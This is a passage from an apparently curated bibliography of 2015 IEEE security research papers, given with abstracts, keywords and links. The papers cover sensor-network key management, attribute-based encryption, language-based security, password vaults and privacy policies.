Abstract: The wireless sensor networks are always deployed in hostile and pervasive environment. They are prone to security threats and they do have a wide range of applications like military, environmental monitoring, health care, etc... traditional network security methods are not up to the mark due to limited resources. Several key management schemes have been proposed security in HSN. In this paper, we propose a key distribution scheme based on random key pre-distribution for heterogeneous sensor networks to achieve better security and performance compared to homogeneous networks, which is suffer from high communication overhead, computation overhead and high storage requirements. A combination of symmetric and asymmetric keys were tried (hybrid), where the cluster head and BS use public key encryption based on ECC, while using symmetric key encryption between the adjacent nodes in the cluster.

Keywords: public key cryptography; telecommunication computing; ubiquitous computing; wireless sensor networks; BS; asymmetric key encryption; cluster head; heterogeneous wireless sensor network security method; high communication overhead; high computation overhead; high storage requirements; hostile environment; hybrid cryptographic technique; key distribution scheme; key management scheme; pervasive environment; public key encryption; random key pre-distribution scheme; security threats; symmetric key encryption; Elliptic curve cryptography; Encryption; ISO Standards; Wireless sensor networks; Yttrium; Heterogeneous wireless sensor network; elliptic curve cryptography (ECC);key management; symmetric encryption (ID#: 16-9376)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7322653&isnumber=7322423

 

Kiviharju, M., "Attribute Pooling for Cryptographic Access Control," in Military Communications and Information Systems (ICMCIS), 2015 International Conference on, pp. 1-12, 18-19 May 2015. doi: 10.1109/ICMCIS.2015.7158677

Abstract: The need to securely share classified information is a long-standing open problem, especially in large and dynamic environments. Multiple large scale approaches, such as NATO Object Level Protection (OLP) and Content-based Protection and Release (CPR) address parts of this problem. CPR contains an example for enforcement paradigm called Cryptographic Access Control (CAC), to enable combining protection and release policies with content, user and terminal properties (or attributes) cryptographically. The main element of CAC in this case is called attribute-based encryption, or ABE. With ABE it is possible to enforce very fine-grained policies, but combining attributes from users and terminals for general policies is cumbersome and not directly possible with existing schemes. We present in this paper a key-management encryption scheme on top of a multi-authority ABE solving the key pooling problem. Direct applications include a more efficient and general CAC approach for e.g. CPR to enable more secure handling of multi-level secure, encrypted content. Indirectly, the more general framework of CAC itself is completed with this functionality.

Keywords: authorisation; cryptography; CAC; CPR; OLP; attribute pooling; attribute-based encryption; content-based protection and release; cryptographic access control; key pooling problem; key-management encryption scheme; multiauthority ABE; multilevel secure encrypted content; object level protection; release policies; terminal properties; Algorithm design and analysis; Cryptography; ABE; CAC; CPR; LW-ABE; MLS; OLP; key management; provable security (ID#: 16-9377)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7158677&isnumber=7158667

 

Manjunath, C.R.; Anand, S.; Nagaraja, G.S., "An Hybrid Secure Scheme for Secure Transmission in Grid Based Wireless Sensor Network," in Advance Computing Conference (IACC), 2015 IEEE International, pp. 472-475, 12-13 June 2015. doi: 10.1109/IADCC.2015.7154753

Abstract: In a Wireless Sensor Networks (WSNs) the sensor nodes are placed in an environment depending on the applications where secure communication is in high demand. To ensure the privacy and safety of data transactions in the network, a unique identification for the nodes and secure key for transportation have become major concerns. In order to establish a secure communication channel in the network, care and address the recourse constraints related to the devices and the scalability of the network when designing a secure key management. An approach for secure communication channel establishment is made in order to suite the functional and architectural features of WSNs. Here a hybrid key management scheme for symmetric key cryptography is attempted to establish a secure communication. An ECC and DH based key management and a certificate generation scheme, where the key is generated to decrypt the certificates to establish link for communication in the network. The hybrid scheme is tested based on amount of energy consumed and security analysis by simulation.

Keywords: data privacy; public key cryptography; telecommunication power management; telecommunication security; wireless sensor networks; DH based key management; Diffie-Hellman based key management; ECC; WSN; certificate generation scheme; data transactions; elliptic curve cryptography; grid based wireless sensor network; hybrid key management scheme; hybrid secure scheme; secure communication channel; secure key management; secure transmission; security analysis; sensor nodes; symmetric key cryptography; Base stations; Clustering algorithms; Elliptic curve cryptography; Elliptic curves; Wireless sensor networks; Elliptic Curve Cryptography; Wireless Sensor Networks; certificate; key establishment; scheme; secure communication (ID#: 16-9378)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7154753&isnumber=7154658

 

Haddad, Z.; Mahmoud, M.; Taha, S.; Saroit, I.A., "Secure and Privacy-Preserving AMI-Utility Communications Via LTE-A Networks," in Wireless and Mobile Computing, Networking and Communications (WiMob), 2015 IEEE 11th International Conference on, pp. 748-755, 19-21 Oct. 2015. doi: 10.1109/WiMOB.2015.7348037

Abstract: In smart grid Automatic Metering Infrastructure (AMI) networks, smart meters should send consumption data to the utility company (UC) for grid state estimation. Creating a new infrastructure to support this communication is costly and may take long time which may delay the deployment of the AMI networks. The Long Term Evolution-Advanced (LTE-A) networks can be used to support the communications between the AMI networks and the UC. However, since these networks are owned and operated by private companies, the UC cannot ensure the security and privacy of the communications. Moreover, the data sent by the AMI networks have different characteristics and requirements than most of the existing applications in LTE-A networks. For example, there is a strict data delay requirement, data is short and transmitted every short time, data is sent at known/predefined time slots, and there is no handover. In this paper, we study enabling secure and privacy preserving AMI-UC communications via LTE-A networks. The proposed scheme aims to achieve essential security requirements such as authentication, confidentiality, key agreement and data integrity without trusting the LTE-A networks. Furthermore, an aggregation scheme is used to protect the privacy of the electricity consumers. It can also reduce the amount of required bandwidth which can reduce the communication cost. Our evaluations have demonstrated that our proposals are secure and require low communication/computational overhead.

Keywords: Long Term Evolution; data protection; power grids; power system security; power system state estimation; smart meters; telecommunication security; LTE-A network; Long Term Evolution-advanced network; UC; aggregation scheme; communication cost reduction; electricity consumer privacy protection; grid state estimation; privacy-preserving AMI-utility communication; secure AMI-UC communication; smart grid automatic metering infrastructure network; smart meter; utility company; Authentication; Delays; Privacy; Smart grids;Smart meters; Wireless communication; Data Aggregation; Key Management; LTE security and privacy preservation; Smart grid AMI (ID#: 16-9379)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7348037&isnumber=7347915

 

Adeka, M.; Shepherd, S.; Abd-Alhameed, R.; Ahmed, N.A.S., "A Versatile and Ubiquitous Secret Sharing," in Internet Technologies and Applications (ITA), 2015, pp. 466-471, 8-11 Sept. 2015. doi: 10.1109/ITechA.2015.7317449

Abstract: The Versatile and Ubiquitous Secret Sharing System, a cloud data repository secure access and a web based authentication scheme. It is designed to implement the sharing, distribution and reconstruction of sensitive secret data that could compromise the functioning of an organisation, if leaked to unauthorised persons. This is carried out in a secure web environment, globally. It is a threshold secret sharing scheme, designed to extend the human trust security perimeter. The system could be adapted to serve as a cloud data repository and secure data communication scheme. A secret sharing scheme is a method by which a dealer distributes shares of a secret data to trustees, such that only authorised subsets of the trustees can reconstruct the secret. This paper gives a brief summary of the layout and functions of a 15-page secure server-based website prototype; the main focus of a PhD research effort titled `Cryptography and Computer Communications Security: Extending the Human Security Perimeter through a Web of Trust'. The prototype, which has been successfully tested, has globalised the distribution and reconstruction processes.

Keywords: Internet; cloud computing; message authentication; trusted computing; ubiquitous computing; AdeVersUS3; Adekas Versatile and Ubiquitous Secret Sharing System; Web based authentication scheme; cloud data repository secure access; human trust security perimeter; secure data communication; secure server-based Website prototype; threshold secret sharing scheme; Computer science; Cryptography; Electrical engineering; IP networks; Prototypes; Radiation detectors; Servers; (k, n)-threshold; authentication; authorised user; cloud data repository; combiner; cryptography; dealer or distributor; human security perimeter; interpolation; key management; participants (trustees); secret sharing (ID#: 16-9380)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7317449&isnumber=7317353

 

Talawar, S.H.; Hansdah, R.C., "A Protocol for End-to-End Key Establishment During Route Discovery in MANETs," in Advanced Information Networking and Applications (AINA), 2015 IEEE 29th International Conference on, pp. 176-184, 24-27 March 2015. doi: 10.1109/AINA.2015.183

Abstract: An end-to-end shared secret key between two distant nodes in a mobile ad hoc network (MANET) is essential for providing secure communication between them. However, to provide effective security in a MANET, end-to-end key establishment should be secure against both internal as well as external malicious nodes. An external malicious node in a MANET does not possess any valid security credential related to the MANET, whereas an internal malicious node would possess some valid security credentials related to the MANET. Most of the protocols for end-to-end key establishment in MANETs either make an unrealistic assumption that an end-to-end secure channel exists between source and destination or use bandwidth consuming multi-path schemes. In this paper, we propose a simple and efficient protocol for end-to-end key establishment during route discovery (E2-KDR) in MANETs. Unlike many other existing schemes, the protocol establishes end-to-end key using trust among the nodes which, during initial stage, is established using public key certificate issued by an off-line membership granting authority. However, the use of public key in the proposed protocol is minimal to make it efficient. Since the key is established during route discovery phase, it reduces the key establishment time. The proposed protocol exploits mobility to establish end-to-end key, and provides comprehensive solution by making use of symmetric keys for protecting routing control messages and end-to-end communication. Moreover, as the end-to-end keys are established during route discovery phase, the protocol is on-demand and only necessary keys are established, which makes the protocol storage scalable. The protocol is shown to be secure using security analysis, and its efficiency is confirmed by the results obtained from simulation experiments.

Keywords: cryptographic protocols; mobile ad hoc networks; multipath channels; private key cryptography; routing protocols; telecommunication security; wireless channels; E2-KDR; MANET; end-to-end secure channel; end-to-end shared secret key; malicious node; mobile ad hoc network; multipath scheme; off-line membership granting authority; protocol storage; public key certificate; route discovery; routing control message protection; secure communication; security analysis; Ad hoc networks; Mobile computing; Public key; Routing; Routing protocols; Key Management; Mobile Ad hoc Network (MANET); Secure Routing (ID#: 16-9381)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7097968&isnumber=7097928


 

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Language Based Security 2015

 

 
SoS Logo

Language Based Security 2015

 

Application-level security is a key to defending against application-level attacks. Because these applications are typically specified and implemented in programming languages, this area is generally known as "language-based security". Research into language -based security focuses on a range of languages and approaches and is relevant to the Science of Security hard problems of resiliency, metrics, and human behavior. The works cited here were presented between January and August of 2014.


R. Kusters, T. Truderung, B. Beckert, D. Bruns, M. Kirsten and M. Mohr, "A Hybrid Approach for Proving Noninterference of Java Programs," Computer Security Foundations Symposium (CSF), 2015 IEEE 28th, Verona, 2015, pp. 305-319. doi: 10.1109/CSF.2015.28

Abstract: Several tools and approaches for proving non-interference properties for Java and other languages exist. Some of them have a high degree of automation or are even fully automatic, but over approximate the actual information flow, and hence, may produce false positives. Other tools, such as those based on theorem proving, are precise, but may need interaction, and hence, analysis is time-consuming. In this paper, we propose a hybrid approach that aims at obtaining the best of both approaches: We want to use fully automatic analysis as much as possible and only at places in a program where, due to over approximation, the automatic approaches fail, we resort to more precise, but interactive analysis, where the latter involves the verification only of specific functional properties in certain parts of the program, rather than checking more intricate non-interference properties for the whole program. To illustrate the hybrid approach, in a case study we use this approach - along with the fully automatic tool Joana for checking non-interference properties for Java programs and the theorem prover KeY for the verification of Java programs - as well as the CVJ framework proposed by Kuesters, Truderung, and Graf to establish cryptographic privacy properties for a non-trivial Java program, namely an e-voting system. The CVJ framework allows one to establish cryptographic indistinguishability properties for Java programs by checking (standard) non-interference properties for such programs.

Keywords: Java; program diagnostics; program verification; theorem proving; CVJ framework; Java programs noninterference properties; Joana; KeY theorem prover; automatic analysis; cryptographic privacy properties; e-voting system; functional property verification; hybrid approach; interactive analysis; noninterference property checking; Cryptography; Electronic mail; Electronic voting; Java; Privacy; Standards; code-level cryptographic analysis; language-based security; noninterference; program analysis (ID#: 16-9451)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7243741&isnumber=7243713

 

A. Askarov, S. Chong and H. Mantel, "Hybrid Monitors for Concurrent Noninterference," Computer Security Foundations Symposium (CSF), 2015 IEEE 28th, Verona, 2015, pp. 137-151. doi: 10.1109/CSF.2015.17

Abstract: Controlling confidential information in concurrent systems is difficult, due to covert channels resulting from interaction between threads. This problem is exacerbated if threads share resources at fine granularity. In this work, we propose a novel monitoring framework to enforce strong information security in concurrent programs. Our monitors are hybrid, combining dynamic and static program analysis to enforce security in a sound and rather precise fashion. In our framework, each thread is guarded by its own local monitor, and there is a single global monitor. We instantiate our monitoring framework to support rely-guarantee style reasoning about the use of shared resources, at the granularity of individual memory locations, and then specialize local monitors further to enforce flow-sensitive progress-sensitive information-flow control. Our local monitors exploit rely-guarantee-style reasoning about shared memory to achieve high precision. Soundness of rely-guarantee-style reasoning is guaranteed by all monitors cooperatively. The global monitor is invoked only when threads synchronize, and so does not needlessly restrict concurrency. We prove that our hybrid monitoring approach enforces a knowledge-based progress-sensitive non-interference security condition.

Keywords: concurrency control; data privacy; inference mechanisms; knowledge based systems; program diagnostics; resource allocation; security of data; storage management; concurrent noninterference; concurrent program; concurrent system; confidential information control; covert channel; dynamic program analysis; flow-sensitive progress-sensitive information-flow control; hybrid monitoring approach; knowledge-based progress-sensitive noninterference security condition; memory location; rely-guarantee style reasoning; resource sharing; security enforcement; shared memory; static program analysis; strong information security; thread interaction; thread synchronization; Cognition; Concurrent computing; Instruction sets; Monitoring; Security; Synchronization; Language-based security; hybrid information-flow monitor; information-flow control for concurrent systems (ID#: 16-9452)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7243730&isnumber=7243713

 

D. Schoepe and A. Sabelfeld, "Understanding and Enforcing Opacity," Computer Security Foundations Symposium (CSF), 2015 IEEE 28th, Verona, 2015, pp. 539-553. doi: 10.1109/CSF.2015.41

Abstract: This paper puts a spotlight on the specification and enforcement of opacity, a security policy for protecting sensitive properties of system behavior. We illustrate the fine granularity of the opacity policy by location privacy and privacy-preserving aggregation scenarios. We present a general framework for opacity and explore its key differences and formal connections with such well-known information-flow models as non-interference, knowledge-based security, and declassification. Our results are machine-checked and parameterized in the observational power of the attacker, including progress-insensitive, progress-sensitive, and timing-sensitive attackers. We present two approaches to enforcing opacity: a whitebox monitor and a blackbox sampling-based enforcement. We report on experiments with prototypes that utilize state-of-the-art Satisfiability Modulo Theories (SMT) solvers and the random testing tool QuickCheck to establish opacity for the location and aggregation-based scenarios.

Keywords: computability; data privacy; pattern classification; sampling methods; security of data; QuickCheck; SMT; aggregation-based scenarios; blackbox sampling-based enforcement; declassification; formal connections; information-flow models; knowledge-based security; location aggregation-based scenarios; location privacy; opacity policy; privacy-preserving aggregation scenarios; progress-insensitive attackers; progress-sensitive attackers; random testing tool; security policy; sensitive system behavior properties; state-of-the-art satisfiability modulo theories solvers; timing-sensitive attackers; whitebox monitor; Knowledge based systems; Monitoring; Nickel; Privacy; Prototypes; Reactive power; Security; information flow; language-based security (ID#: 16-9453)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7243753&isnumber=7243713

 

 

A. Dabrowski, I. Echizen and E. R. Weippl, "Error-Correcting Codes As Source For Decoding Ambiguity," Security and Privacy Workshops (SPW), 2015 IEEE, San Jose, CA, 2015, pp. 99-105. doi: 10.1109/SPW.2015.28

Abstract: Data decoding, format, or language ambiguities have been long known for amusement purposes. Only recently it came to attention that they also pose a security risk. In this paper, we present decoder manipulations based on deliberately caused ambiguities facilitating the error correction mechanisms used in several popular applications. This can be used to encode data in multiple formats or even the same format with different content. Implementation details of the decoder or environmental differences decide which data the decoder locks onto. This leads to different users receiving different content based on a language decoding ambiguity. In general, ambiguity is not desired, however in special cases it can be particularly harmful. Format dissectors can make wrong decisions, e.g. A firewall scans based on one format but the user decodes different harmful content. We demonstrate this behavior with popular barcodes and argue that it can be used to deliver exploits based on the software installed, or use probabilistic effects to divert a small percentage of users to fraudulent sites.

Keywords: bar codes; decoding; encoding; error correction codes; fraud; security of data; barcodes; data decoding; data encoding; decoder manipulations; error correction mechanisms; error-correcting codes; format dissectors; fraudulent sites; language decoding ambiguity; security risk; Decoding; Error correction codes; Security; Software; Standards; Synchronization; Visualization; Barcode; Error Correcting Codes; LangSec; Language Security; Packet-in-Packet; Protocol decoding ambiguity; QR; Steganography (ID#: 16-9454)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7163213&isnumber=7163193

 

R. Chatterjee, J. Bonneau, A. Juels and T. Ristenpart, "Cracking-Resistant Password Vaults Using Natural Language Encoders," Security and Privacy (SP), 2015 IEEE Symposium on, San Jose, CA, 2015, pp. 481-498. doi: 10.1109/SP.2015.36

Abstract: Password vaults are increasingly popular applications that store multiple passwords encrypted under a single master password that the user memorizes. A password vault can greatly reduce the burden on a user of remembering passwords, but introduces a single point of failure. An attacker that obtains a user's encrypted vault can mount offline brute-force attacks and, if successful, compromise all of the passwords in the vault. In this paper, we investigate the construction of encrypted vaults that resist such offline cracking attacks and force attackers instead to mount online attacks. Our contributions are as follows. We present an attack and supporting analysis showing that a previous design for cracking-resistant vaults -- the only one of which we are aware -- actually degrades security relative to conventional password-based approaches. We then introduce a new type of secure encoding scheme that we call a natural language encoder (NLE). An NLE permits the construction of vaults which, when decrypted with the wrong master password, produce plausible-looking decoy passwords. We show how to build NLEs using existing tools from natural language processing, such as n-gram models and probabilistic context-free grammars, and evaluate their ability to generate plausible decoys. Finally, we present, implement, and evaluate a full, NLE-based cracking-resistant vault system called NoCrack.

Keywords: context-free grammars; cryptography; encoding; natural language processing; probability; NLE; NoCrack; cracking-resistant password vaults; cracking-resistant vault system; encoding scheme security; encrypted vault construction; force attackers; n-gram models; natural language encoders; natural language processing; offline brute-force attacks; offline cracking attacks; password encryption; plausible decoys; plausible-looking decoy passwords; probabilistic context-free grammars; Dictionaries; Encryption; Force; MySpace; Natural languages; Honey Encryption; Language Model; PCFG;  Password Model; Password Vault (ID#: 16-9455)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7163043&isnumber=7163005

 

M. Anwar and A. Imran, "Access Control for Multi-tenancy in Cloud-Based Health Information Systems," Cyber Security and Cloud Computing (CSCloud), 2015 IEEE 2nd International Conference on, New York, NY, 2015, pp. 104-110. doi: 10.1109/CSCloud.2015.95

Abstract: Cloud technology can be used to support cost effective, scalable, and well-managed healthcare information systems. However, cloud computing, particularly multitenancy, introduces privacy and security issues related to personal health information (PHI). In this paper, we designed ontological models for healthcare workflow and multi-tenancy, and then applied HIPAA requirements on the models to generate HIPAA-compliant access control policies. We used Semantic Web Rule Language (SWRL) to represent access control policies as rules, and we verified the rules with an OWL-DL reasoner. Additionally, we implemented HIPAA security rules through access control policies in a cloud-based simulated healthcare environment. More specifically, we investigated access control policy specification and enforcement for cloud based healthcare information systems using an open source cloud platform, OpenStack. The results manifest HIPAA compliance through authorization policies that are capable of addressing vulnerabilities of multi-tenancy.

Keywords: authorisation; cloud computing; health care; medical information systems; ontologies (artificial intelligence);public domain software; HIPAA-compliant access control policy; OpenStack platform; PHI; authorization policy; cloud computing; cloud technology; cloud-based health information systems; health care information systems; ontological models; open source cloud platform; personal health information; semantic Web rule language; Access control; Cloud computing; Databases; Insurance; Medical services; Ontologies; HIPAA; access control; health cloud; multitenancy; ontological model; openstack (ID#: 16-9456)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7371467&isnumber=7371418

 

R. N. M. Watson et al., "CHERI: A Hybrid Capability-System Architecture for Scalable Software Compartmentalization," Security and Privacy (SP), 2015 IEEE Symposium on, San Jose, CA, 2015, pp. 20-37. doi: 10.1109/SP.2015.9

Abstract: CHERI extends a conventional RISC Instruction-Set Architecture, compiler, and operating system to support fine-grained, capability-based memory protection to mitigate memory-related vulnerabilities in C-language TCBs. We describe how CHERI capabilities can also underpin a hardware-software object-capability model for application compartmentalization that can mitigate broader classes of attack. Prototyped as an extension to the open-source 64-bit BERI RISC FPGA soft-core processor, Free BSD operating system, and LLVM compiler, we demonstrate multiple orders-of-magnitude improvement in scalability, simplified programmability, and resulting tangible security benefits as compared to compartmentalization based on pure Memory-Management Unit (MMU) designs. We evaluate incrementally deployable CHERI-based compartmentalization using several real-world UNIX libraries and applications.

Keywords: data protection; operating systems (computers); program compilers; reduced instruction set computing; software architecture; C-language TCB; CHERI; LLVM compiler; RISC instruction-set architecture; capability-based memory protection; hardware-software object-capability model; hybrid capability-system architecture; operating system; software compartmentalization; Hardware; Kernel; Libraries; Reduced instruction set computing; Registers; Security; CHERI processor; capability system; computer architecture; memory protection; object capabilities; software compartmentalization (ID#: 16-9457)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7163016&isnumber=7163005

 

Xiaoran Zhu, Yuanmin Xu, Jian Guo, Xi Wu, Huibiao Zhu and Weikai Miao, "Formal Verification of PKMv3 Protocol Using DT-Spin," Theoretical Aspects of Software Engineering (TASE), 2015 International Symposium on, Nanjing, 2015, pp. 71-78. doi: 10.1109/TASE.2015.20

Abstract: WiMax (Worldwide Interoperability for Microwave Access, IEEE 802.16) is a standard-based wireless technology, which uses Privacy Key Management (PKM) protocol to provide authentication and key management. Three versions of PKM protocol have been released and the third version (PKMv3) strengthens the security by enhancing the message management. In this paper, a formal analysis of PKMv3 protocol is presented. Both the subscriber station (SS) and the base station (BS) are modeled as processes in our framework. Discrete time describes the lifetime of the Authorization Key (AK) and the Transmission Encryption Key (TEK), which are produced by BS. Moreover, the PKMv3 model is constructed through the discrete-time PROMELA (DT-PROMELA) language and the tool DT-Spin implements the PKMv3 model with lifetime. Finally, we simulate communications between SS and BS and some properties are verified, i.e. liveness, succession and message consistency, which are extracted from PKMv3 and specified using Linear Temporal Logic (LTL) formulae and assertions. Our model provides a basis for further verification of PKMv3 protocol with time characteristic.

Keywords: WiMax; authorisation; computer network security; cryptographic protocols; formal verification; message authentication; private key cryptography; temporal logic; AK; BS; DT-PROMELA language; DT-Spin; DT-spin; IEEE 802.16; LTL; PKM protocol; PKMv3 model; PKMv3 protocol; SS;TEK; WiMax; Worldwide Interoperability for Microwave Access; authentication; authorization key; base station; discrete-time PROMELA language; formal verification; linear temporal logic; message management; privacy key management protocol; security; standard-based wireless technology; subscriber station; third version; transmission encryption key; Authentication; Authorization; Encryption; IEEE 802.16 Standard; Protocols; DT-Spin; Discrete-time PROMELA;PKMv3 protocol; modeling; verification (ID#: 16-9458)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7307736&isnumber=7307716

 

S. Sadki and H. El Bakkali, "An Approach for Privacy Policies Negotiation in Mobile Health-Cloud Environments," Cloud Technologies and Applications (CloudTech), 2015 International Conference on, Marrakech, 2015, pp. 1-6. doi: 10.1109/CloudTech.2015.7336983

Abstract: Mobile technologies continue to improve patients' quality of care. Particularly, with the emergence of Cloud-based mobile services and applications, patients can easily communicate with their physicians and receive the care they deserve. However, due to the increased number of privacy threats in mobile and Cloud computing environments, maximizing patients' control over their data becomes a necessity. Thus, formal languages to express their privacy preferences are needed. Besides, because of the diversity of actors involved in patient's care, conflict among privacy policies can take place. In this paper, we present an approach that aims to resolve the problem of conflicting privacy policies based on a Security Policy Negotiation Framework. The major particularity of our solution is that it considers the patient to be a crucial actor in the negotiation process. The different steps of our approach are illustrated through an example of three conflicting privacy policies with different privacy languages.

Keywords: cloud computing; data privacy; health care ;medical computing; mobile computing; cloud computing; cloud-based mobile services; formal language; mobile health-cloud environment; mobile technology; patient care; privacy policy negotiation; security policy negotiation framework; Cloud computing; Data privacy; Medical services; Mobile communication; Organizations; Privacy; Security; Cloud computing; mobile health; policy negotiation; privacy; privacy policy (ID#: 16-9459)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336983&isnumber=7336956

 

H. T. Poon and A. Miri, "An Efficient Conjunctive Keyword and Phase Search Scheme for Encrypted Cloud Storage Systems," Cloud Computing (CLOUD), 2015 IEEE 8th International Conference on, New York City, NY, 2015, pp. 508-515. doi: 10.1109/CLOUD.2015.74

Abstract: There has been increasing interest in the area of privacy-protected searching as industries continue to adopt cloud technologies. Much of the recent efforts have been towards incorporating more advanced searching techniques. Although many have proposed solutions for conjunctive keyword search, it is only recently that researchers began exploring phrase search over encrypted data. In this paper, we present a scheme that incorporates both functionalities. Our solution makes use of symmetric encryption, which provides computational and storage efficiency over schemes based on public key encryption. By considering the statistical properties of natural languages, we were able to design indexes that significantly reduce storage cost when compared to existing solutions. Our solution allows for simple ranking of results and requires a low storage cost while providing document and keyword security. By using both the index and the encrypted documents to performs searches, our scheme is also currently the only phrase search scheme capable of searching for non-indexed keywords.

Keywords: cloud computing; data protection; natural language processing; public key cryptography; storage management; advanced searching techniques; cloud technology; conjunctive keyword search; encrypted cloud storage systems; keyword security; natural languages; phase search scheme; privacy-protected searching; public key encryption; statistical property; storage cost reduction; symmetric encryption; Cloud computing; Encryption; Indexes; Keyword search; Servers; Conjunctive keyword search; Encryption; Phrase search; Privacy; Security (ID#: 16-9460)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7214084&isnumber=7212169

 

E. M. Songhori, S. U. Hussain, A. R. Sadeghi, T. Schneider and F. Koushanfar, "Tiny Garble: Highly Compressed and Scalable Sequential Garbled Circuits," Security and Privacy (SP), 2015 IEEE Symposium on, San Jose, CA, 2015, pp. 411-428. doi: 10.1109/SP.2015.32

Abstract: We introduce Tiny Garble, a novel automated methodology based on powerful logic synthesis techniques for generating and optimizing compressed Boolean circuits used in secure computation, such as Yao's Garbled Circuit (GC) protocol. Tiny Garble achieves an unprecedented level of compactness and scalability by using a sequential circuit description for GC. We introduce new libraries and transformations, such that our sequential circuits can be optimized and securely evaluated by interfacing with available garbling frameworks. The circuit compactness makes the memory footprint of the garbling operation fit in the processor cache, resulting in fewer cache misses and thereby less CPU cycles. Our proof-of-concept implementation of benchmark functions using Tiny Garble demonstrates a high degree of compactness and scalability. We improve the results of existing automated tools for GC generation by orders of magnitude, for example, Tiny Garble can compress the memory footprint required for 1024-bit multiplication by a factor of 4,172, while decreasing the number of non-XOR gates by 67%. Moreover, with Tiny Garble we are able to implement functions that have never been reported before, such as SHA-3. Finally, our sequential description enables us to design and realize a garbled processor, using the MIPS I instruction set, for private function evaluation. To the best of our knowledge, this is the first scalable emulation of a general purpose processor.

Keywords: logic circuits; logic design; TinyGarble methodology; Yao garbled circuit protocol; compactness degree; compressed Boolean circuits; general purpose processor; instruction set; logic synthesis techniques; private function evaluation; scalability degree; sequential description; sequential garbled circuits; Hardware design languages; Libraries; Logic gates; Optimization; Protocols; Sequential circuits; Wires; Garbled Circuit; Hardware Synthesis; Logic Design; Secure Function Evaluation (ID#: 16-9461)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7163039&isnumber=7163005

 

A. Vasilateanu and A. Buga, "AsthMate -- Supporting Patient Empowerment through Location-Based Smartphone Applications," Control Systems and Computer Science (CSCS), 2015 20th International Conference on, Bucharest, 2015, pp. 411-417.  doi: 10.1109/CSCS.2015.61

Abstract: The ever changing challenges and pressures to the healthcare domain have introduced the urgency of finding a replacement for traditional systems. Breakthroughs registered by information systems, advances in data storage and processing solutions sustained by the ubiquity of gadgets and an efficient infrastructure for network and services have sustained a shift of medical systems towards digital healthcare. Asth Mate application is an e-health tool for asthma patients, acting as an enabler for patient empowerment. The contributions brought by the application are both to the individual and to the community exposing a web application that allows citizens to check the state of the air for the area they live in. The ongoing implementation can benefit of the advantages of cloud computing solutions in order to ensure a better deployment and data accessibility. However, data privacy is a key aspect for such systems. In consideration of this reason, a proper trade-off between the functionality, data openness and security should be reached.

Keywords: cloud computing; health care; smart phones; Asth Mate application; Web application; asthma patients; cloud computing solutions; data privacy; digital healthcare; e-health tool; information systems; location-based smartphone applications; patient empowerment; Biomedical monitoring; Cloud computing; Collaboration; Diseases; Monitoring; Prototypes; cloud computing; e-health; mobile computing; patient empowerment (ID#: 16-9462)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7168462&isnumber=7168393

 

S. Daoudagh, F. Lonetti and E. Marchetti, "Assessment of Access Control Systems Using Mutation Testing," TEchnical and LEgal aspects of data pRivacy and SEcurity, 2015 IEEE/ACM 1st International Workshop on, Florence, 2015, pp. 8-13. doi: 10.1109/TELERISE.2015.10

Abstract: In modern pervasive applications, it is important to validate access control mechanisms that are usually defined by means of the standard XACML language. Mutation analysis has been applied on access control policies for measuring the adequacy of a test suite. In this paper, we present a testing framework aimed at applying mutation analysis at the level of the Java based policy evaluation engine. A set of Java based mutation operators is selected and applied to the code of the Policy Decision Point (PDP). A first experiment shows the effectiveness of the proposed framework in assessing the fault detection of XACML test suites and confirms the efficacy of the application of code-based mutation operators to the PDP.

Keywords: Java; authorisation; program diagnostics; program testing; ubiquitous computing; Java based mutation operators; Java based policy evaluation engine; PDP; access control system assessment; code-based mutation operators; fault detection; mutation testing analysis; policy decision point code; standard XACML language; Access control; Engines; Fault detection; Java; Proposals; Sun; Testing (ID#: 16-9463)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7182463&isnumber=7182453

 

S. Sadki and H. E. Bakkali, "Towards Negotiable Privacy Policies in Mobile Healthcare," Innovative Computing Technology (INTECH), 2015 Fifth International Conference on, Galcia, 2015, pp. 94-99. doi: 10.1109/INTECH.2015.7173478

Abstract: With the increased use of mobile technologies in the health sector, patients are more and more concerned about their privacy protection. Particularly, due to the diversity of actors (physicians, healthcare organizations, Cloud providers...) and the heterogeneity of privacy policies defined by each actor, conflicts among these policies may occur. We believe that negotiation is one of the best techniques for resolving the issue of conflicting privacy policies. From this perspective, we present an approach and algorithm to negotiate privacy policies based on an extension of the bargaining model. Besides, in order to show how our solution can be applied, we present an example of conflicting privacy policies expressed using S4P, a generic language for specifying privacy preferences and policies.

Keywords: data privacy; medical information systems; mobile computing; S4P; bargaining model; generic language; health sector; mobile healthcare; mobile technologies; negotiable privacy policies; privacy policies; privacy preferences; privacy protection; Data privacy; Medical services; Mobile communication; Mobile handsets; Pragmatics; Privacy; Vocabulary; Mobile Healthcare; component; conflicting policies; policy negotiation; privacy; privacy policy language (ID#: 16-9464)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7173478&isnumber=7173359

 

